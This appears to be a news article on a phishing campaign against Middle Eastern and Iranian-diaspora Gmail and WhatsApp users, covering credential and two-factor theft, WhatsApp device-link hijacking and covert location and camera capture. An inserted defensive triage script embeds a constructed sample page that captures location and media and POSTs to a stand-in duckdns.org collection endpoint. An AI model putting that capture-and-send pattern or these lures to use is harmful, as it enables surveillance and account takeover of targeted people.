How the hacking campaign targeted high-profile Gmail and WhatsApp users in the Middle East


On Tuesday, British-based Iranian activist Nariman Gharib tweeted a redacted image of a phishing link that had been sent to someone in a WhatsApp message.

“Don’t click on suspicious links,” Gharib warned. The activist, who has been following the digital side of Iran’s protests from afar, said the campaign was targeting people involved in Iran-related activities, including himself.

This hacking campaign comes at a time when Iran is enduring the longest national internet shutdown in its history, as anti-government protests – and violent crackdowns – rage across the country. Since Iran and its closest adversaries are very active in offensive cyberspace (read: hacking people), we wanted to learn more.

Gharib shared the full phishing link with TechCrunch after the post, allowing us to obtain a copy of the source code of the phishing web page used in the attack.

TechCrunch analyzed the source code of the phishing page and, with additional input from security researchers, we believe the campaign aims to steal Gmail and other online credentials, compromise WhatsApp accounts, and conduct surveillance by stealing location data, photos, and audio recordings.

It’s unclear whether the hackers are government-affiliated agents, spies, or cybercriminals — or all three.

TechCrunch also identified a way to view a real-time copy of all victim responses stored on the attacker’s server, which was left exposed and accessible without a password. This data shows dozens of victims who unwittingly entered their credentials into the phishing site and were then hacked.

The list includes Middle East academics working in national security studies; the head of an Israeli drone maker; a senior Lebanese cabinet minister; at least one journalist; and people located in the United States or with US phone numbers.

TechCrunch is publishing our findings after validating many of Gharib’s reports. The phishing site is now down.

Inside the attack chain

According to Gharib, the WhatsApp message he received contained a suspicious link, which loaded a phishing site in the victim’s browser.

[Image: two screenshots of the WhatsApp message, showing a malicious link to whatsapp-meeting.duckdns.org. Image credit: Nariman Gharib]

The link shows that the attackers relied on a dynamic DNS provider called DuckDNS for their phishing campaign. Dynamic DNS providers let people point an easy-to-remember web address – in this case, a duckdns.org subdomain – at a server whose IP address may change frequently.

It’s not clear whether the attacker took the phishing site down of their own accord, or was caught and cut off by DuckDNS. We reached out to DuckDNS with questions, but owner Richard Harper asked us to file an abuse report instead.

From what we know, the attackers used DuckDNS to mask the real location of the phishing page, possibly so that the link would look like a genuine WhatsApp link.

The phishing page is actually hosted on the domain alex-fabow.online, which was first registered in early November 2025. Several other related domains are hosted on the same dedicated server, and their names follow a pattern suggesting that the campaign also impersonates other virtual meeting room and messaging providers, such as meet-safe.online and whats-login.online.

We’re not sure exactly what happens when the DuckDNS link is loaded in a victim’s browser, or how the link determines which specific phishing page to load. It is possible that the DuckDNS link directs the target to a specific phishing page based on information obtained from the user’s device.

The phishing page would not load in our web browser, preventing us from interacting with the page directly. However, reading the page’s source code allowed us to better understand the attack method.

Gmail credentials and phone number phishing

Depending on the target, clicking the phishing link opens either a fake Gmail login page or a prompt for a phone number, and starts a chain of attacks aimed at stealing passwords and two-factor authentication codes.

But the phishing page’s source code has at least one flaw: TechCrunch discovered that by modifying the phishing page’s URL in our web browser, we could view a file on the attacker’s server that keeps a record of every victim who signed in with their credentials.

The file contains more than 850 records of information sent by victims during the attack. The log records each step of the phishing flow a victim went through, including a copy of the username and password the victim entered on the phishing page, as well as mistyped entries and two-factor codes, effectively acting as a keylogger.

The records also contain each victim’s user agent, a text string that identifies the operating system and browser version used to view the website. This data shows that the campaign was designed to target Windows, macOS, iPhone and Android users.

The exposed file allowed us to follow the attack flow step by step for each victim. In one case, the file appears to show the victim clicking on a malicious link, which opened a page that looked like a Gmail login window. The log shows the victim entering his email credentials several times until he entered the correct password.

The records show the same victim then entered a two-factor authentication code sent by text message. We can say this because Google sends the two-factor code in a specific format (usually “G-” followed by a six-digit numeric code).

WhatsApp hijacking and browser data exfiltration

Beyond stealing credentials, the campaign can also enable surveillance by tricking victims into sharing their device’s location, audio, and images.

In Gharib’s case, clicking on the link in the phishing message opened a fake WhatsApp-themed page in his browser, which displayed a QR code. The lure was designed to trick the target into scanning the code with their phone, ostensibly to join a virtual meeting room.

[Image: the exposed stream of records from the attacker’s server, showing attack flow data such as logins and passwords entered on the phishing pages. Image credit: TechCrunch]

Gharib said the QR code was generated by the attacker, and scanning or tapping it would directly link the victim’s WhatsApp account to a device controlled by the attacker, giving them access to the victim’s data. This is a long-known attack technique that abuses WhatsApp’s device-linking feature, and a similar technique has been used against users of the Signal messaging app.

We asked Runa Sandvik, founder of Granite, a security firm that works to protect at-risk individuals, to examine a copy of the phishing page’s code and explain how it works.

Sandvik found that when the page loads, its code triggers browser permission prompts asking the user for access to their location (via navigator.geolocation) as well as to the camera and microphone (via navigator.getUserMedia).

If the user accepts, the browser immediately sends the person’s coordinates to the attacker, allowing them to pinpoint the victim’s location. The page keeps sending the victim’s location data every few seconds for as long as the page remains open.

The code also lets the attackers record audio and take photos every three to five seconds using the device’s camera. However, we did not see any collected location, audio, or image data on the exposed server.
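The article and Sandvik’s analysis contain no code; the triage script below is an added example written for this page. It scans a captured phishing page’s source for the browser capabilities described above (geolocation, camera/microphone, a repeating timer, an outbound channel) and for hosts fronted by dynamic DNS such as DuckDNS. The sample page source and the hostnames in it are constructed, not the real kit.

```javascript
// Added example: static triage of a suspected phishing page's source.
// Not the attacker's code and not Sandvik's tooling; sample input is constructed.
const SIGNALS = [
  { id: "geolocation", re: /navigator\.geolocation\.(getCurrentPosition|watchPosition)\s*\(/, note: "requests device location" },
  { id: "media",       re: /getUserMedia\s*\(/,                     note: "requests camera and/or microphone" },
  { id: "periodic",    re: /setInterval\s*\(/,                      note: "repeats an action while the page stays open" },
  { id: "exfil",       re: /\b(fetch|XMLHttpRequest|sendBeacon)\b/, note: "has a channel to send data to a server" },
];

// DuckDNS is the provider named in the article; ddns.net is another
// well-known dynamic DNS domain, added here as an assumption.
const DYNAMIC_DNS = ["duckdns.org", "ddns.net"];

// Collect every hostname that appears in an absolute http(s) URL.
function extractHosts(src) {
  const hosts = new Set();
  for (const m of src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Return the matched signals, the hosts the page talks to, which of those sit
// under a dynamic DNS domain, and a coarse verdict for an analyst's queue.
function triagePageSource(src) {
  const findings = SIGNALS.filter((s) => s.re.test(src)).map((s) => s.id);
  const hosts = extractHosts(src);
  const dynDns = hosts.filter((h) => DYNAMIC_DNS.some((d) => h === d || h.endsWith("." + d)));
  const captures = findings.includes("geolocation") || findings.includes("media");
  let verdict = "low";
  if (captures && findings.includes("exfil")) verdict = "high"; // capture plus an outbound channel
  else if (captures || dynDns.length > 0) verdict = "medium";
  // A timer next to capture-and-send is the "every few seconds" pattern.
  const continuous = verdict === "high" && findings.includes("periodic");
  return { findings, hosts, dynDns, continuous, verdict };
}

// Constructed sample that mimics the shape of the behaviour described above.
// The callbacks are deliberately undefined; this is not a working kit.
const SAMPLE_SOURCE = `
<img src="https://static.example.org/meeting-logo.png">
<script>
  navigator.geolocation.watchPosition(report);
  navigator.mediaDevices.getUserMedia({ audio: true, video: true }).then(startCapture);
  setInterval(snapshot, 4000);
  fetch("https://meeting-lure.duckdns.org/collect", { method: "POST" });
</script>`;

console.log(JSON.stringify(triagePageSource(SAMPLE_SOURCE), null, 2));
```

A real triage run would feed the script the saved page source (as TechCrunch obtained it) rather than the embedded sample.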

Thoughts on victims, timing, and attribution

We do not know who is behind this campaign. What is clear is that the campaign succeeded in stealing credentials from victims, and it is possible that the phishing campaign will re-emerge.

Although we know the identities of some of the people in this cluster of victims, we do not have enough information to understand the nature of the campaign. The number of victims compromised by this campaign (that we know of) is quite small – fewer than 50 individuals – and it includes seemingly ordinary people in the Kurdish community, as well as academics, government officials, business leaders, and other senior figures in the Iranian diaspora and the Middle East.

There may be more victims than we know of; identifying them could help us understand who is being targeted, and perhaps why.

This case could be a government-backed actor

It is unclear what motivated the hackers to steal people’s credentials and hijack WhatsApp accounts; knowing the motive could also help identify who is behind this hacking campaign.

Government-backed groups, for example, may want to steal email passwords and two-factor codes from high-value targets, such as politicians or journalists, in order to access private and confidential information.

This is plausible because Iran is now almost completely cut off from the outside world, and getting information into or out of the country is a challenge. The Iranian government, or foreign governments with an interest in Iranian affairs, may want to know who is interacting with Iranian influencers, and how.

So the timing of this phishing campaign, and who it targets, could point to an espionage campaign that aims to gather information about a narrow list of targets.

We asked Gary Miller, a security researcher at Citizen Lab and an expert on mobile espionage, to also examine the phishing code and some of the data that appeared from the attacker’s server.

Miller said the attack “definitely (has) the hallmarks of an IRGC-related spearphishing campaign,” referring to the highly targeted email hacks carried out by Iran’s Islamic Revolutionary Guard Corps (IRGC), a branch of Iran’s military known for conducting cyberattacks. Miller pointed to a mix of indicators, including the international scope of the targeting, the credential theft, the abuse of popular messaging platforms like WhatsApp, and the social engineering techniques used in the phishing links.

This case may be a financially motivated actor

On the other hand, financially motivated hackers can use the stolen Gmail passwords and two-factor codes of other high-value targets, such as company executives, to steal proprietary and sensitive business information from their inboxes. Hackers can also force password resets on victims’ cryptocurrency and bank accounts to empty their wallets.

The campaign’s focus on accessing the victim’s location and device media is, however, unusual for financially motivated actors, who have little use for images and audio recordings.

We asked Ian Campbell, a threat researcher at DomainTools, which analyzes public internet records, to look at the domain names used in the campaign to help us understand when they were first created, and whether they were connected to other infrastructure that was already known or previously identified.

Campbell found that the campaign targeted victims in the midst of Iran’s nationwide protests, using infrastructure that had been set up weeks earlier. He added that most of the domains related to this campaign were registered in early November 2025, and one related domain was created a few months earlier, in August 2025. Campbell described the domain as medium to high risk, and said it is associated with financially motivated cybercrime operations.

An additional wrinkle is that the Iranian government has been known to outsource cyberattacks to criminal hacking groups, presumably to obscure its involvement in hacking operations against its own citizens. The US Treasury has previously sanctioned Iranian companies that acted as fronts for Iran’s IRGC and carried out cyberattacks, such as targeted phishing and social engineering attacks.

As Miller noted, “This makes the point that clicking on unwanted WhatsApp links, no matter how convincing, is a high-risk and unsafe practice.”

To contact this reporter securely, you can reach Signal via the username: zackwhittaker.1337

Lorenzo Franceschi-Bicchierai contributed reporting.
